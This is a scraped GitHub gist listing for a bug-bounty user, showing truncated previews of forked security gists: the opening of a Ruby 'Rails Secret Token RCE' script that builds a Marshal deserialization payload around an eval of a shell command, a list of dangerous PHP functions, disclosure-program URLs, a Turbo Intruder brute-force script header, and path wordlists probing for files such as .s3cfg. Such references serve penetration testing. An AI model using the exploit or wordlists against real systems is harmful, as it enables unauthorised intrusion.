rhwilr - https://gist.github.com/rhwilr/ce7338a972ef0c5585ce0c01e54bb13b#os-installation
joariasl - https://gist.github.com/joariasl/e58ca997d2581236dc56
abdulsec abdulsec
abdulsec
/ rails-secret-token-rce.rb
Created
February 23, 2025 19:43
— forked from rootxharsh/rails-secret-token-rce.rb
Rails Secret Token RCE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
| require 'base64' | |
| require 'openssl' | |
| require 'optparse' | |
| require 'open-uri' | |
| SECRET_TOKEN = "SECRET HERE" | |
| code = "eval('`COMMAND HERE`')" | |
| marshal_payload = Base64.encode64( | |
| "\x04\x08" + | |
| "o" + |
abdulsec
/ Filename extension list
Created
September 22, 2023 00:58
— forked from securifera/Filename extension list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .php | |
| .html | |
| .txt | |
| .htm | |
| .aspx | |
| .asp | |
| .js | |
| .css | |
| .pgsql.txt | |
| .mysql.txt |
abdulsec
/ My Manjaro Linux (GNOME) Web Development Environment Setup.md
Created
April 21, 2022 07:13
— forked from calebklc/My Manjaro Linux (GNOME) Web Development Environment Setup.md
My Manjaro Linux (GNOME) Web Development Environment Setup
abdulsec
/ phpdangerousfuncs.md
Created
January 10, 2022 04:23
— forked from mccabe615/phpdangerousfuncs.md
Dangerous PHP Functions
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
abdulsec
/ bbprograms.txt
Created
June 23, 2021 19:18
— forked from haxcited/bbprograms.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| google dork -> site:.co.uk inurl:"responsible disclosure" | |
| https://registry.internetnz.nz/about/vulnerability-disclosure-policy/ | |
| http://www.123contactform.com/security-acknowledgements.htm | |
| https://18f.gsa.gov/vulnerability-disclosure-policy/ | |
| https://support.1password.com/security-assessments/ | |
| https://www.23andme.com/security-report/ | |
| https://www.abnamro.com/en/footer/responsible-disclosure.html | |
| https://www.accenture.com/us-en/company-accenture-responsible-disclosure | |
| https://www.accredible.com/white_hat/ | |
| https://www.acquia.com/how-report-security-issue |
abdulsec
/ cluster.py
Created
June 20, 2021 13:44
— forked from defparam/cluster.py
Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering | |
| # Author: Evan Custodio (@defparam) | |
| # | |
| # MIT License | |
| # Copyright 2021 Evan Custodio | |
| # | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: | |
| # | |
| # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. | |
| # |
abdulsec
/ api_wordlist.txt
Created
May 3, 2021 08:45
— forked from Uyavuz24/api_wordlist.txt
api wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /2 | |
| /graphql-proxy/admin | |
| /3.0/ | |
| /3ds_callback | |
| /3ds_update_payment_callback | |
| /accounts | |
| /active | |
| /activity | |
| /actuator | |
| /actuator/auditevents |
abdulsec
/ introspection-query.graphql
Created
March 2, 2021 22:37
— forked from craigbeck/introspection-query.graphql
Introspection query for GraphQL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| query IntrospectionQuery { | |
| __schema { | |
| queryType { name } | |
| mutationType { name } | |
| subscriptionType { name } | |
| types { | |
| ...FullType | |
| } | |
| directives { |
abdulsec
/ short-wordlist.txt
Created
February 16, 2021 04:08
— forked from tomnomnom/short-wordlist.txt
short-wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.s3cfg | |
| /phpunit.xml | |
| /nginx.conf | |
| /.vimrc | |
| /LICENSE.md | |
| /yarn.lock | |
| /Gulpfile | |
| /Gulpfile.js | |
| /composer.json | |
| /.npmignore |
abdulsec
/ JavascriptRecon.md
Created
January 21, 2021 04:51
My Javascript Recon Process - BugBounty
NewerOlder